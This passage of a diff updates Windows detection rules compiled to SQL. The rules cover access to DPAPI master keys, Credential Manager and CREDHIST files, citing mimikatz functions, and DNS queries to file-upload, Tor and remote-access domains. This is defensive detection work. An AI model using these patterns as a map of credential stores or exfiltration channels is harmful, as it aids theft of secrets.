"1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "status": "test", - "description": "Detects service installation with 
suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious processes based on name and 
location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "status": "test", - "description": "This 
rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" 
URI. It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", - "author": "pH-T (Nextron Systems)", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND 
ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - 
"attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND NewProcessName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "Potential 
SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE QueryName LIKE '%.anonfiles.com%' ESCAPE '\\'" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control 
Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program 
Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detect suspicious LDAP request 
from non-Windows application", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE (QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unknown 
binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (NewProcessName LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE QueryName LIKE '%ufile.io%' ESCAPE '\\'" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the tool" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE 
'%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program 